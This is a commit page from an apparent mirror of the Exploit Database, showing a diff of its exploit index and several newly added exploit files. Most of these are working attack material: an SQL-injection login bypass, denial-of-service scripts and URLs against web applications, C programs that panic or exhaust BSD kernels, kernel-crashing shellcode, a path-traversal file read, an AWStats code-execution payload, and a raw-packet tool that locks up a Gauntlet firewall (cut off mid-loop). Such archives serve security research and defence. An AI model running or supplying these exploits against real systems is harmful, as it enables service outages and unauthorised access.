bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-14

Browse source 
191 new exploits
This commit is contained in:
Offensive Security 2015-08-14 05:02:47 +00:00
parent a732415255
commit 9569f264ec
195 changed files with 14708 additions and 787 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -1418,7 +1418,7 @@ id,file,description,date,author,platform,type,port
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure & Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure / Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0
1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
@ -16982,7 +16982,7 @@ id,file,description,date,author,platform,type,port
19612,platforms/windows/remote/19612.pl,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (1)",1999-11-07,"Alain Thivillon & Stephane Aubert",windows,remote,0
19613,platforms/windows/remote/19613.rb,"Poison Ivy 2.3.2 C&C Server Buffer Overflow",2012-07-06,metasploit,windows,remote,3460
19614,platforms/windows/remote/19614.asm,"Trend Micro InterScan VirusWall 3.2.3/3.3 Long HELO Buffer Overflow Vulnerability (2)",1999-11-07,"dark spyrit",windows,remote,0
19615,platforms/unix/remote/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow & Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,remote,0
19615,platforms/unix/dos/19615.c,"ISC BIND <= 8.2.2_IRIX <= 6.5.17_Solaris 7.0 - (NXT Overflow and Denial of Service) Vulnerabilities",1999-11-10,"ADM Crew",unix,dos,0
19616,platforms/windows/dos/19616.c,"Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow)",1999-11-08,Interrupt,windows,dos,0
19617,platforms/windows/remote/19617.txt,"NetcPlus SmartServer3 3.5.1 POP Buffer Overflow Vulnerability",1999-11-11,"Ussr Labs",windows,remote,0
19618,platforms/windows/remote/19618.txt,"Microsoft Internet Explorer 5.0 Media Player ActiveX Error Message Vulnerability",1999-11-14,"Georgi Guninski",windows,remote,0
@ -17659,7 +17659,7 @@ id,file,description,date,author,platform,type,port
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service Vulnerability",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0
20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0
20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,dos,0
20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,dos,0
20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0
20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x Brute-Force Vulnerability",2000-10-29,Craig,windows,remote,0
@ -29438,7 +29438,7 @@ id,file,description,date,author,platform,type,port
32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0
32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0
32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0
32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0
32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,dos,0
32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0
32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0
32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0
@ -34074,4 +34074,6 @@ id,file,description,date,author,platform,type,port
37749,platforms/lin_x86/shellcode/37749.c,"Linux x86 Egg Hunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0
37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80
37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
37762,platforms/lin_x86/shellcode/37762.py,"Linux x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0
37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0
37768,platforms/windows/local/37768.txt,"Windows 8.1 DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0

Can't render this file because it is too large.

49
platforms/asp/dos/12527.txt Executable file
View file

@ -0,0 +1,49 @@
************************************************************
** Administrador de Contenidos Admin Login Bypass vulnerability
************************************************************
** Prodcut: Administrador de Contenidos
** Home : www.DZ4All.cOm/Cc
** Vunlerability : Admin Bypass
** Risk : High
** Dork : "Diseño Web Hernest Consulting S.L."
************************************************************
** Discovred by: Ra3cH
** From : Algeria
** Contact : e51@hotmail.fr
** *********************************************************
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen
************************************************************
** Exploit:
** http://[PATH]/admin or http://[PATH]/admin/Login.Asp
**
** user : ' or '1=1
** password : ' or '1=1
**
************************************************************
************************************************************

17
platforms/asp/dos/27258.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/16771/info
Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests.
This issue allows remote attackers to consume excessive CPU resources on targeted computers, denying service to legitimate users.
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=
An example script to exploit this issue is also available:
while [ 1 ]
do
wget -O /dev/null http://www.example.com:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=
done

7
platforms/asp/dos/35154.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45588/info
Sigma Portal is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)

38
platforms/bsd/dos/19488.c Executable file
View file

@ -0,0 +1,38 @@
source: http://www.securityfocus.com/bid/622/info
A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.
Details behind why this happens have not been made available.
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}

31
platforms/bsd/dos/21077.c Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/3220/info
It has been reported that there is a locally exploitable vulnerability in BSDI.
It is allegedly possible for a userland process to cause the kernel to halt.
This may be due to a bad system call.
/* (BSDi)*[v3.0/3.1] system failure, by
v9[v9@realhalo.org]. this will result
in the ability of any user to fail the
system, and reboot it. this bug is
similar to that of the "f00f" bug.
results are similar, except this reboots
the machine instead of having a freezing
effect. tested, and built for: BSDi
v3.0/3.1. (arch/non-specific to BSDi)
*/
char bsdi_killcode[] =
"\xb8\x8f\xf8\xff\x0b\xf7\xd0\x50\xb0\x0b"
"\xb0\x9a\x50\x89\xe7\xff\xd7";
int main() {
void (*execcode)()=(void *)bsdi_killcode;
printf("[ (BSDi)*[v3.0/3.1]: system failu"
"re, by: v9[v9@realhalo.org]. ]\n");
printf("*** no output should be seen afte"
"r this point.\n");
execcode();
printf("*** system failure failed.\n");
exit(0);
}

54
platforms/cgi/dos/1157.pl Executable file
View file

@ -0,0 +1,54 @@
#!/usr/bin/perl
use LWP::Simple;
if (@ARGV < 3)
{
print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";
print "sever - URL chat\n";
print "path - path to chat.pl\n";
print "mode - poc or dos,\n";
print " poc - simple check without DoS and exit,\n";
print " dos - DoS, you must set count for requests in 4 argument.\n\n";
exit ();
}
$DoS = "dos";
$POC = "poc";
$server = $ARGV[0];
$path = $ARGV[1];
$mode = $ARGV[2];
$count = $ARGV[3];
print qq(
###################################
# GTChat <= 0.95 Alpha remote DoS #
# tested on GTChat 0.95 Alpha #
# (c)oded by x97Rang 2005 RST/GHC #
# Respect: b1f, 1dt.w0lf, ed #
################################### );
if ($mode eq $POC)
{
print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
$URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
$content = get "$URL";
if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }
if ($content =~ /Fatal error/)
{
print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";
print "=== OUTPUT ===============================================================================\n";
print "\n$content\n";
print "=============================================================================== OUTPUT ===\n";
exit();
}
else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
}
if ($mode eq $DoS)
{
if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
print "\nSend $count DoS requests to $server...\n";
$URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
print "Done, packets sended.\n";
}
# milw0rm.com [2005-08-18]

46
platforms/cgi/dos/1175.pl Executable file
View file

@ -0,0 +1,46 @@
# Use a high user # for best results. /str0ke
#!/usr/bin/perl
######################
# codez0red by VTECin5th #
# Feel free to modify/break this script #
# Crappy code is more effective =] #
# I accept no responsibility for misuse or abuse #
######################
# Usage: xxx.pl www.server.com /directory_to_chat/ #_of_users_to_create
######################
# Affected Software: GTChat .95
# Unaffected Software: GTChat .93
######################
use IO::Socket;
if (@ARGV < 2){
print "Usage:\n xxx.pl www.server.com /Path_to_GTChat/ #_of_users_to_create\n";
print "Example:\n xxx.pl www.serfer.com /GTChat/cgi-bin/ 5";
exit;
}
$dir = $ARGV[1];
$numero = $ARGV[2];
$host = $ARGV[0];
$host =~ s/http\:\/\///gi;
for ($i = 1; $i <= $numero; $i++) {
$rando = int(rand(234));
$randy = int(rand(12));
$whyThem = $randy . $rando . "@" . $randy . ".com";
$whyMe = "SoSorry" . $rando . $randy;
$lol = "$dir/chat.pl?action=register&name=$whyMe&password=$whyMe&password2=$whyMe&email=$whyThem&privateemail=0";
$ox=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp') || die "Oh No! You broke teh server!";
print $ox "GET $lol HTTP/1.1\r\n";
print $ox "Accept: */*\r\n";
print $ox "Accept-Language: pt\r\n";
print $ox "Accept-Encoding: gzip, deflate\r\n";
print $ox "User-Agent: 1337 pwnz0r\r\n";
print $ox "Host: $host\r\n";
print $ox "Connection: Keep-Alive\r\n\r\n\r\n";
print "currently on: $whyMe \t ($i)\n";
# Please note, this does not verify whether or not the user is actually being created.
# I assume you know how to use this script.
}
print "Finished creating $numero users";
close($ox);
# milw0rm.com [2005-08-23]

8
platforms/cgi/dos/20400.txt Executable file
View file

@ -0,0 +1,8 @@
source : http://www.securityfocus.com/bid/1934/info
Cart32 is a shopping cart application for e-commerce enabled sites.
Cart32 is subject to a denial of service. When requesting a specially formed URL the application will cause the CPU utilization to spike to 100%. A restart of the application is required in order to gain normal functionality.
http://target/cgi-bin/c32web.exe/ShowProgress

9
platforms/cgi/dos/20753.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/2588/info
Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability.
A problem in the Net.Commerce package could allow a remote user to deny service to legitimate users of the service hosted by the Websphere server. This is due to the handling of long strings by the macro.d2w cgi included with a Net.Commerce installation. By supplying a long string of "%0a" characters to the CGI, the Websphere server ceases operation.
A remote user may use this vulnerability to crash the Websphere server, thus denying service to legitimate users.
http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a

9
platforms/cgi/dos/24619.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/11226/info
Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions.
An attacker may leverage the authentication bypass issue to gain unauthorized access to the administrator scripts of the affected application, facilitating manipulation of various server settings. The denial of service issue may be exploited to cause the affected computer to freeze, denying service to legitimate users.
http://www.example.com//PUBLIC/ADMIN/INDEX.HTM
Note that the '//' after the 'http://www.example.com' is where a session ID would be presented, by providing no data between these slashes a NULL session ID is used to authenticate the attacker.

65
platforms/cgi/dos/3223.pl Executable file
View file

@ -0,0 +1,65 @@
##
## cvstrack-resurrect.pl -- CVSTrac Post-Attack Database Resurrection
## Copyright (c) 2007 Ralf S. Engelschall <rse@engelschall.com>
##
use DBI; # requires OpenPKG perl-dbi
use DBD::SQLite; # requires OpenPKG perl-dbi, perl-dbi::with_dbd_sqlite=yes
use DBIx::Simple; # requires OpenPKG perl-dbix
use Date::Format; # requires OpenPKG perl-time
my $db_file = $ARGV[0];
my $db = DBIx::Simple->connect(
"dbi:SQLite:dbname=$db_file", "", "",
{ RaiseError => 0, AutoCommit => 0 }
);
my $eow = q{\x00\s.,:;?!)"'};
sub fixup {
my ($data) = @_;
if ($$data =~ m:/[^$eow]*/[^$eow]*'[^$eow]+:s) {
$$data =~ s:(/[^$eow]*/[^$eow]*)('[^$eow]+):$1 $2:sg;
return 1;
}
return 0;
}
foreach my $rec ($db->query("SELECT name, invtime, text FROM wiki")->hashes()) {
if (&fixup(\$rec->{"text"})) {
printf("++ adjusting Wiki page \"%s\" as of %s\n",
$rec->{"name"}, time2str("%Y-%m-%d %H:%M:%S", -$rec->{"invtime"}));
$db->query("UPDATE wiki SET text = ? WHERE name = ? AND invtime = ?",
$rec->{"text"}, $rec->{"name"}, $rec->{"invtime"});
}
}
foreach my $rec ($db->query("SELECT tn, description, remarks FROM ticket")->hashes()) {
if (&fixup(\$rec->{"description"}) or &fixup(\$rec->{"remarks"})) {
printf("++ adjusting ticket #%d\n",
$rec->{"tn"});
$db->query("UPDATE ticket SET description = ?, remarks = ? WHERE tn = ?",
$rec->{"description"}, $rec->{"remarks"}, $rec->{"tn"});
}
}
foreach my $rec ($db->query("SELECT tn, chngtime, oldval, newval FROM tktchng")->hashes()) {
if (&fixup(\$rec->{"oldval"}) or &fixup(\$rec->{"newval"})) {
printf("++ adjusting ticket [%d] change as of %s\n",
$rec->{"tn"}, time2str("%Y-%m-%d %H:%M:%S", $rec->{"chngtime"}));
$db->query("UPDATE tktchng SET oldval = ?, newval = ? WHERE tn = ? AND chngtime = ?",
$rec->{"oldval"}, $rec->{"newval"}, $rec->{"tn"}, $rec->{"chngtime"});
}
}
foreach my $rec ($db->query("SELECT cn, message FROM chng")->hashes()) {
if (&fixup(\$rec->{"message"})) {
printf("++ adjusting change [%d]\n",
$rec->{"cn"});
$db->query("UPDATE chng SET message = ? WHERE cn = ?",
$rec->{"message"}, $rec->{"cn"});
}
}
$db->commit();
$db->disconnect();
# milw0rm.com [2007-01-29]

44
platforms/cgi/dos/817.pl Executable file
View file

@ -0,0 +1,44 @@
#!/usr/bin/perl
#
#
# Summarized the advisory www.ghc.ru GHC: /str0ke
#
# [0] Exploitable example (raw log plugin):
# Attacker can read sensitive information
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog
#
# [1] Perl code execution. (This script)
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent
#
# [2] Arbitrary plugin including.
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib
#
# [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development).
# Every user can access debug function:
#
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1
# http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2
#
# Be sure to change the $server + /cgi-bin location /str0ke
#
use IO::Socket;
$server = 'www.example.com';
sub ConnectServer {
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
|| die "Error\n";
print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "\n\n";
}
while () {
$rp = rand;
&ConnectServer;
}
# milw0rm.com [2005-02-14]

58
platforms/freebsd/dos/19505.c Executable file
View file

@ -0,0 +1,58 @@
source: http://www.securityfocus.com/bid/653/info
A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out).
FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code.
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
#define NFILE 64
#define NLINK 30000
#define NCHAR 245
int
main()
{
char junk[NCHAR+1],
dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1];
int i, j;
struct stat sb;
memset(junk, 'x', NCHAR);
junk[NCHAR] = '\0';
for (i = 0; i < NFILE; i++) {
printf("\r%02d/%05d...", i, 0),
fflush(stdout);
sprintf(dir, "%02d-%02d", i, 0);
if (mkdir(dir, 0755) < 0)
fprintf(stderr, "mkdir(%s) failed\n", dir),
exit(1);
sprintf(file1, "%s/%s%03d", dir, junk, 0);
if (creat(file1, 0644) < 0)
fprintf(stderr, "creat(%s) failed\n", file1),
exit(1);
if (stat(file1, &sb) < 0)
fprintf(stderr, "stat(%s) failed\n", file1),
exit(1);
for (j = 1; j < NLINK; j++) {
if ((j % 1000) == 0) {
printf("\r%02d/%05d...", i, j),
fflush(stdout);
sprintf(dir, "%02d-%02d", i, j/1000);
if (mkdir(dir, 0755) < 0)
fprintf(stderr, "mkdir(%s) failed\n", dir),
exit(1);
}
sprintf(file2, "%s/%s%03d", dir, junk, j%1000);
if (link(file1, file2) < 0)
fprintf(stderr, "link(%s,%s) failed\n", file1, file2),
exit(1);
if (stat(file2, &sb) < 0)
fprintf(stderr, "stat(%s) failed\n", file2),
exit(1);
}
}
printf("\rfinished successfully\n");
}

245
platforms/hardware/dos/19441.c Executable file
View file

@ -0,0 +1,245 @@
source: http://www.securityfocus.com/bid/556/info
There is a vulnerability in Gauntlet Firewall 5.0 which allows an attacker to remotely cause a denial of service. The vulnerability occurs because Gauntlet Firewall cannot handle a condition where an ICMP Protocol Problem packet's (ICMP_PARAMPROB) encapsulated IP packet has a random protocol field and certain IP options set. When this specially constructed packet ( [ICMP PARAMPROB][IP with random protocol code and some ip options] ) is sent THROUGH the Gauntlet Firewall (not to the firewall itself), the firewall will hang, looking for the packet in it's transparency tables.
The packet structure looks like this:
Begin Packet
------------------------------------------
[NORMAL IP HEADER]
[ICMP PARAMPROB HEADER]
-- encapsulated ip packet --
[IP HEADER]
(important fields in ip header)
ip_p = 98 (let's specify a protocol that doesn't exist)
ip_hl = 0xf (stuff options)
------------------------------------------
End Packet
An attacker would do the following:
Construct the [ip-icmp-ip] packet using a raw socket (SOCK_RAW) with the fields set accordingly, destination set to any machine behind the firewall.
Send the packet(s).
The number of packets that need to be sent depends on the platform (ie Sol on a Sparc vs BSDI).
The consequence of this vulnerability being exploited is the target Gauntlet 5.0 firewall being remotely locked up. It should be expected that an attacker would send packets with spoofed source addresses in the ip header making it difficult to trace.
/*
* Discovered and written by: <godot@msg.net> <- Send money to :-)
* aka Mike Frantzen <frantzen@expert.cc.purdue.edu> <- Reply to
*
* Network Associates: "Who's watching your network?"
* MSG.net "Who's watching the watchers?"
*
* This can be found online at http://www.msg.net/firewalls/tis/bland.c
*
* Description:
* If you know an IP that will be routed through a Gauntlet 5.0 Firewall,
* you can remotely lock up the firewall (tested against Solaris 2.6 and
* BSDI). It locks up to the point that one packet will disable STOP-A
* (L1-A) on Sparcs and ~3-5 packets will disable Ctrl-Alt-Del on BSDI
* (Ctrl-Alt-Del still prompts Y/N but it never reboots).
*
* **You can NOT send this to the Gauntlet's IP. The packet must be one
* **that would go through the forwarding code.
*
* If you are on local ether to the firewall, set it as your default route
* or otherwise send the packet to the firewall's MAC.
*
* The packet is parsed before the packet filtering rules in Gauntlet. So
* the only known work-around is to ACL out ICMP type 12 at your screening
* router.
* Or you could switch to Gauntlet 5.5 which (in the beta) does not seem to
* be vulnerable -- but 5.5 introduces some new 'issues'.
*
*
* Technical Description of the packet:
* The packet is an ICMP Paramater Problem packet that encapsulates an IP
* packet with IP Options. There is a random protocol in the encapsulated
* IP packet. The trick is: the inner packet MUST have IP Options. Some
* options work, some don't.
* The firewall apparently is looking for the packet (or an entry in its
* transparency table) that matches the encapsulated packet. It just keeps
* looking.... It likely has interrupts masked off on Solaris.
*
*
* You need libnet to link this against. It's a pretty spiffy lib.
* http://www.infonexus.com/~daemon9/Projects/Libnet
* http://www.packetfactory.net/libnet
*
*
* For da script kiddies:
* Compile with 'gcc -o bland bland.c -lnet'
* ./bland -d <ip through the firewall>
* (Did you remember to install Libnet???)
*
*
* If it doesn't compile on your machine: I DON'T CARE!!! This program was
* a quick and dirty hack. You try reading a hexdump of a packet off the
* wire and writing something that can reproduce it.
* I know it compiles and works from FreeBSD 3.1
*
*
* Network Associates (TIS) was notified two weeks ago and they are working
* on a patch.
*
*
* Plugs:
* ISIC -- Program I used (and wrote) to find bugs in Gauntlet's IP stack.
* http://expert.cc.purdue.edu/~frantzen/isic-0.02.tar.gz
* Libnet -- Was able to write the basic exploit in 20 minutes because of
* libnet. See libnet link above. Thanks go out to Route!
*
*
* Credits:
* Mike Frantzen <frantzen@expert.cc.purdue.edu> Hey, thats me!
* Mike Scher <strange@cultural.com>
* Kevin Kadow <kadokev@msg.net> <- Gauntlet Random Seed Hole
* Lenard Lynch <llynch@tribune.com>
* Viki Navratilova <vn@msg.net>
*/
#include <libnet.h>
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... <godot@msg.net>\n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksuming. Spent a day trying to get it to work in
* perl... That sucked... Tequilla would have helped immensly.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
